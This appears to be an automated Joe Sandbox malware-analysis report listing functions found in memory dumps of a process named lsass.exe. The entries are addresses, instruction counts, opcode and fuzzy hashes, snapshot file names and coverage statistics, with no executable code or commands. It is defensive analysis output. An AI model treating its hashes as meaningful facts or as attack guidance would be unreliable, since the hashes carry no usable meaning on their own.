Opcode ID: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
Instruction ID: 624d4073347742b9ff765891060ddd61b86c9c0a59168b2dfd7acee5a4650519
Opcode Fuzzy Hash: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
Instruction Fuzzy Hash: 46F03130B0A91E8AEB74DB94CC547B973B1EF94312F1142B6C40ED31B5CEB86AC59B04

Function 00007FFD9BA90B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0880b320df87e1fd2aebc6e1f84a766d2d09f04a7be67e37219169eba4ffc92b
Instruction ID: 66e275042fe43429db4194280a9873e1bea29862b087232ab798f4f052034040
Opcode Fuzzy Hash: 0880b320df87e1fd2aebc6e1f84a766d2d09f04a7be67e37219169eba4ffc92b
Instruction Fuzzy Hash: 4DF0557550D649CFD744AB38ECA18D4BB60EB46208B5611EAD088C7063E250055CC700

Function 00007FFD9BE8273A Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8be24aaa2b6836b7234efa9b661269457ee79e86a255a544c2654bd7d2947bb
Instruction ID: 108a32533256e0930b8b8c2393cea3606d30b5be9bcdca3e52b192c70ef83e3b
Opcode Fuzzy Hash: d8be24aaa2b6836b7234efa9b661269457ee79e86a255a544c2654bd7d2947bb
Instruction Fuzzy Hash: D7F09621A0EBC64FEB325BE44CA11B83FE0DF1734071906FAC4598B0E3D56976159751

Function 00007FFD9BA932A4 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
Instruction ID: c023202db5ac554ee8ef429da07319877c102b9d1bea6545d85a11373985ff18
Opcode Fuzzy Hash: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
Instruction Fuzzy Hash: D9F05420B0A50E4AEFB4D784C8A46B973B1EF54311F214176C40DD71F6CD696E459A44

Function 00007FFD9BE90F69 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdee1155981ea0287da762e0566d38a8a281bf7344a6daa33082e04b78932607
Instruction ID: 6925b17c767e6ac2b0aed3b1fe9db1a899add16af58187b1c36d85f29571b2d6
Opcode Fuzzy Hash: cdee1155981ea0287da762e0566d38a8a281bf7344a6daa33082e04b78932607
Instruction Fuzzy Hash: 14E0D820709B884FC70E9A388C695507FB1EB7710238A02DBD005CB2A3ED1DDCC9C751

Function 00007FFD9BA90D00 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f158bff5b829b422bbb2a48e6efe41d953bb783b57ac01076b245ff510083e9
Instruction ID: 298695a15140d47a4e3735a7d717b9477e7eccb34a87b4a5ab2076b5726cb9bc
Opcode Fuzzy Hash: 1f158bff5b829b422bbb2a48e6efe41d953bb783b57ac01076b245ff510083e9
Instruction Fuzzy Hash: 85F0B430B0920ECEF774DB98C4947E977E0FF54790F0442B5D018C62D5DA786684CB40

Function 00007FFD9BA916B0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
Instruction ID: 289277905241efed55c810d967a070c52c913059ae72b46f2ead5c86f2e615c9
Opcode Fuzzy Hash: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
Instruction Fuzzy Hash: 5CE09231B0851A8BF729A744C8B07B832A5EB94300F1641BCC94FD36E1DDB8AE018688

Function 00007FFD9BE920A9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1d9542f4646ab9c5ad8ff181ff6a7a64a2215a7f99e9b62c3147c18f685c2a
Instruction ID: e5253ccc090521f59d71c8090d7cfff90b29b500fcdc138b5dd0c06a30673fe5
Opcode Fuzzy Hash: 6e1d9542f4646ab9c5ad8ff181ff6a7a64a2215a7f99e9b62c3147c18f685c2a
Instruction Fuzzy Hash: BBE04F2694F7C04FCB1B9B3588B88903F70EE5721074A51EAC045CF1B3E91E9D4AC702

Function 00007FFD9BA906A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
Instruction ID: 31cb928d6a64b144bb59743e4b8d3a11998b5290e6e4d3ba9f9e31f633f4b59a
Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
Instruction Fuzzy Hash: A4C04C06F5B51F01F53573EE54660ADB1405FD5E90FD70172D60C840E19DDD22D5215E

Function 00007FFD9BE8323B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
Instruction ID: 65dab1aaab59432a3b2924f22a37de5358456d1e3ed899672f4e8ecaf9d4ea0e
Opcode Fuzzy Hash: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
Instruction Fuzzy Hash: 39D09214B0FE5B85F67B4AC1817027955A85F41700E224239E07F498E1992FBB056201

Function 00007FFD9BA9520E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e22298c2859926618715ea15b515993e236fb083192079b70e8cdf84373f805
Instruction ID: f93752eaf21a4b3ba75e99daf71e0c660fa20d729082769452b474588c295bc6
Opcode Fuzzy Hash: 2e22298c2859926618715ea15b515993e236fb083192079b70e8cdf84373f805
Instruction Fuzzy Hash: 46C04C02F1981A16F25E6718552167E44439F5861CFD641B4F82EDA3CECE5C5B0116C6

Function 00007FFD9BE8324E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
Instruction ID: 7cf21f05094245be56c2dbee9adb12bde9cfcefa56b4bae0f5df1fa24ace8602
Opcode Fuzzy Hash: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
Instruction Fuzzy Hash: D0C01220A0EA4A8BF226479480352652BA49F42300F2340B9D42E4A8B2C96A7B069211

Function 00007FFD9BA906C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
Instruction ID: 2277868fafa2bb2999c8a1dafac6a0a4c78bb41a2cc164afc5614813a4c2fb10
Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
Instruction Fuzzy Hash: 30B01204D5740F00E53433FA089206970405B44540FC20170D80CC009198CD12D42246

Non-executed Functions

Function 00007FFD9BA909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9BA90B3E
!k9, xrefs: 00007FFD9BA90B4E
"s9, xrefs: 00007FFD9BA90B46
c9, xrefs: 00007FFD9BA90B56

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 8427abffb43e06e61b54787f1b924671775fca52df01a143520a22ac10f7113a
Instruction ID: 02d3f3b49675545417aa03f0796e16043be8708e0bec88f880b2b18217a52de5
Opcode Fuzzy Hash: 8427abffb43e06e61b54787f1b924671775fca52df01a143520a22ac10f7113a
Instruction Fuzzy Hash: DE418117B0D06659E239B3FD78619ED1B488FA927F70847B7F46D8D0D78C486085C2E9

Analysis Process: lsass.exePID: 3412, Parent PID: 2596COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	4

Executed Functions

Function 00007FFD9BAA0D47 Relevance: 1.5, Strings: 1, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5[_H, xrefs: 00007FFD9BAA0DF3

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: dd61ee5f3603773a77af227fe0e3c0cf4e33f70abb6291c60c5554a60e0d58c3
Instruction ID: bba0043ab46303e0eb1c3041c49274c1740b20d09acd4018090667d003ed7676
Opcode Fuzzy Hash: dd61ee5f3603773a77af227fe0e3c0cf4e33f70abb6291c60c5554a60e0d58c3
Instruction Fuzzy Hash: 5B9105B1A09A8D8FE755EBAC88797A87BE1FF55314F0001BED04AD76E2DB782810C714

Function 00007FFD9BAB16BB Relevance: 1.0, Instructions: 1030COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5220ef92d7c98ea70832ea4f349730e8380e1139e94e832d57058e7c553e92d
Instruction ID: 9deff2075b7e39b1a2e6a4bf5a4e66959be54af4e4276d0730f6ea7e75f0ac81
Opcode Fuzzy Hash: b5220ef92d7c98ea70832ea4f349730e8380e1139e94e832d57058e7c553e92d
Instruction Fuzzy Hash: 8B62E631B1991E4FEBA8EB5884656B87392FFA4350F0542B9D01EC31D7DE78BD428B80

Function 00007FFD9BAE5A98 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad1000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7967070f0378c15cc1c9d4e11f48cd94f3199d84d8864b8cde017688ace889bc
Instruction ID: 5d494a2aa5e199b36369b7a8e2ff993b3352025e5a80e8b9eeb2927b8444b92e
Opcode Fuzzy Hash: 7967070f0378c15cc1c9d4e11f48cd94f3199d84d8864b8cde017688ace889bc
Instruction Fuzzy Hash: C9415972A0E78D4FEB69DBA898596B87FA0EF56310F04017FD04DC71A2EA646A05C741

Function 00007FFD9BE93D58 Relevance: 1.4, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9BE93DD2

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9fb256dd3b3df440c8de97170cba62553e01930184ef206d859e708a80eed9dc
Instruction ID: 3098a41c1ad81645dabcf26bd7b20cfa2a9365705ce3693c6a8d86f4895dfff5
Opcode Fuzzy Hash: 9fb256dd3b3df440c8de97170cba62553e01930184ef206d859e708a80eed9dc
Instruction Fuzzy Hash: DE51A031E0960E9FDB5ADBA8C4655FDB7B1FF48304F1141BAD01AE72E6CA396905CB00

Function 00007FFD9BAC5C95 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BAC5C76

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 755c72906c6671fe76f44db110342a4a086811fba057f98450a4d40f3ecb5b2b
Instruction ID: f1d300dbedab3f08788d44bea8edf006b567acaa91234cb1222e2df6ba7d2ff3
Opcode Fuzzy Hash: 755c72906c6671fe76f44db110342a4a086811fba057f98450a4d40f3ecb5b2b
Instruction Fuzzy Hash: C2F06261A1F3C54FDB26A7394C654647FA0EE6721074A82FFC096CB0F3D959994BC311

Function 00007FFD9BAC5C59 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BAC5C76

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 8e7f8278afc8eec2d210438dab6d5f9e596278666f49261b44566a46f451a591
Instruction ID: 721d77244758ea8574e583e0c1b9cab8fe7c0f7f574fe6e555d97bdc64095b2b
Opcode Fuzzy Hash: 8e7f8278afc8eec2d210438dab6d5f9e596278666f49261b44566a46f451a591
Instruction Fuzzy Hash: 69E0657150E7C48FC716AA7448694547FA0EF6720174A41EFC046CF1A7DA1DC845C701

Function 00007FFD9BAC9B39 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BAC9B56

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: cb2716b927e0573be4256e2eb57890cd645b1c512b6bce0cf1e580e8a826d4b2
Instruction ID: 46131faacf7d0d944c98bf334291b1a0d953027abc10341bf66ba9c321a6d6ce
Opcode Fuzzy Hash: cb2716b927e0573be4256e2eb57890cd645b1c512b6bce0cf1e580e8a826d4b2
Instruction Fuzzy Hash: 73E0126154E3C44FCB0AEB7488698553FA0AE6B21078B40EEC186CF2B3E62DC949C701

Function 00007FFD9BAC9CE9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BAC9D06

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: b4aac325a864865cc2f085eadbe5bd1fb04963acf1403d34d14f580ae8c616b9
Instruction ID: bb57b4b67300a1035811d329e12cffce58d2000cb4c74842f86b4850881fc77e
Opcode Fuzzy Hash: b4aac325a864865cc2f085eadbe5bd1fb04963acf1403d34d14f580ae8c616b9
Instruction Fuzzy Hash: 13E01A7194E7C44FCB16EB7588AA9547FA1EF6721078B40EEC085CF1B3E62D8849C701

Function 00007FFD9BEA0FF9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BEA1016

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 5ef4501469642ab71cb921a2cbfe7b3ea37f4b5fb937bb49431145dddac97153
Instruction ID: 9e12f8af956b37235a26c66ba1f7897a132f1aa5e64652999e93831eab0a2463
Opcode Fuzzy Hash: 5ef4501469642ab71cb921a2cbfe7b3ea37f4b5fb937bb49431145dddac97153
Instruction Fuzzy Hash: 17E012A154F7C44FC716EB7488798447FA19E6731178B41EEC146CF1B3E62D8949C701

Function 00007FFD9BC01DBA Relevance: .7, Instructions: 747COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2041754636.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bc00000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 077a0d1459e0381491069a711d34d95c7bd2821d753ea34ba2b665f30f4bd2b8
Instruction ID: 9c126d37bf5444528e02cf50d49bf6760f17c0ded749834abfe045349be098e9
Opcode Fuzzy Hash: 077a0d1459e0381491069a711d34d95c7bd2821d753ea34ba2b665f30f4bd2b8
Instruction Fuzzy Hash: 1E528371A1DA5D4FDF98EB58C8A5AA8B7F1FF68354F0441E9E04DC3292CA397D808B41

Function 00007FFD9BE93FCF Relevance: .4, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d9a81f6dc08137ffff95ac3a3b44db2d00351a78debeb611e88c6957dc6fbe
Instruction ID: 50e5f2081c6fe8cc72c6f19b75f5c4312a6cd475c4e9fc0c0cd54c1dae1563af
Opcode Fuzzy Hash: 16d9a81f6dc08137ffff95ac3a3b44db2d00351a78debeb611e88c6957dc6fbe
Instruction Fuzzy Hash: B0F1E2306196498FEB68CF58C4E06B53BB1FF49301F5442BDC84ACB69BDA39E985CB41

Function 00007FFD9BE95037 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ed1cf8858ea71a11c372e55005ab9fd91ce4a7d0d4a3df4f2943bf6592ab5e
Instruction ID: 99d97d2b1443ac3eec3decb54336a9bba63504279164a67ec2e9d5c86b8a149b
Opcode Fuzzy Hash: 47ed1cf8858ea71a11c372e55005ab9fd91ce4a7d0d4a3df4f2943bf6592ab5e
Instruction Fuzzy Hash: 75D13530A0EB0A8FE379DB68D4A157577F0FF45300B25057EC44EC36A6DA2AB94A8B41

Function 00007FFD9BAA1171 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b91acc27d1e571c001089f71f30ea3b42412ce073dba5c0c59598f67e56c2f
Instruction ID: fa624c396da8bdefd19df1ab0f6c2e4f4477b1f94720fe0c82df0207def71374
Opcode Fuzzy Hash: e6b91acc27d1e571c001089f71f30ea3b42412ce073dba5c0c59598f67e56c2f
Instruction Fuzzy Hash: F8B11630A0964D8FDB58EF68C865AF97BE1FF56310F04417BD44DC71A2CA74A845CB90

Function 00007FFD9BE93FEF Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f13a8dfcb0bd115a07c2f4549f901ed3f175266e31db7d8bbd858f8ef9a42122
Instruction ID: 255bae0f4ad1529d4bc205a102c3d77631e57baf6b787807f8c16c674b024cce
Opcode Fuzzy Hash: f13a8dfcb0bd115a07c2f4549f901ed3f175266e31db7d8bbd858f8ef9a42122
Instruction Fuzzy Hash: 24C1033061A64A8BEB2DCF58C0E05B137B1FF45301B5546BDC88B8B69BDA39F985CB41

Function 00007FFD9BE93882 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12b8a78353ddbc51a3e7d6e2f1e7f568307dcf60fa821745b977012a84f99c8
Instruction ID: 8926859c2e87c2d9518e964f82e3510ea393299830191d3989765b9d610f08f7
Opcode Fuzzy Hash: d12b8a78353ddbc51a3e7d6e2f1e7f568307dcf60fa821745b977012a84f99c8
Instruction Fuzzy Hash: BAB1363070EA4A9FE36ADB68C4A16B4B7A1FF49300F4541BDC04EC7A97DB29B955C780

Function 00007FFD9BAC9D21 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 619bbbc0499b63a0758ed3a05cba198c1c10988b8f6a859cafc2dde918f5a74f
Instruction ID: cd2fedf50f050afa81a6c3ae8ae69c4272bafc4cfb29f91f2159799a2c2cd292
Opcode Fuzzy Hash: 619bbbc0499b63a0758ed3a05cba198c1c10988b8f6a859cafc2dde918f5a74f
Instruction Fuzzy Hash: 28A1AF70B1890D4FDB55FB68C4A8AB977E1FF98314F514679E01EC72A6DF38A8428780

Function 00007FFD9BE91247 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99cbdccb923369d9cb793d4f74fb607b589ba0ea718cc31acc4528a2dc0fbf76
Instruction ID: 00dde0e822e7f1bbada33351e549770bd4b6c186b925449e75703dda4e99c1dc
Opcode Fuzzy Hash: 99cbdccb923369d9cb793d4f74fb607b589ba0ea718cc31acc4528a2dc0fbf76
Instruction Fuzzy Hash: DF21F902F0F29BA6F675A1E928310FC16485F59238F2A02B6D49D850F3DC0E36895383

Function 00007FFD9BE92DB6 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5e9a9a0cdc74916bb816cba8eecd0aeda4bb604197385ecab826e043af58201
Instruction ID: 1a716149d8d6b91ef292e25f7118398dcf832f149297626b19802b16c213dd1f
Opcode Fuzzy Hash: b5e9a9a0cdc74916bb816cba8eecd0aeda4bb604197385ecab826e043af58201
Instruction Fuzzy Hash: 34819A31B1EB4A4FEB3D9BA894615B977E4FF45300F16017ED48EC31A2DE2AB50A8741

Function 00007FFD9BE90EF9 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18b355c9b04606de1d0fec1dbc03e50c0cb59c4d5b64c0d794b2c9416933178b
Instruction ID: f59914bac7e86e04828dde15e1f6ca85cb29bf7b9d988123bb18a9f2a8707c30
Opcode Fuzzy Hash: 18b355c9b04606de1d0fec1dbc03e50c0cb59c4d5b64c0d794b2c9416933178b
Instruction Fuzzy Hash: EC714A31A0E58D4FE778DA5888669B837D4FF44310B1502B9D49FC75B3DE1AAE0E8782

Function 00007FFD9BE91ABB Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a5b9948674444a75df47333babf3b201c123351d546950e64b4aca1afc3467
Instruction ID: c7ad7b84095d504777eacf9e63784cc052536b155f4e2d5dc0e8e9b8a54f31a0
Opcode Fuzzy Hash: 24a5b9948674444a75df47333babf3b201c123351d546950e64b4aca1afc3467
Instruction Fuzzy Hash: 6281E230E1E64EEFEB69DBA488606FC7BA5EF45300F1105B9D01EC71E6EA296945C702

Function 00007FFD9BE9E597 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
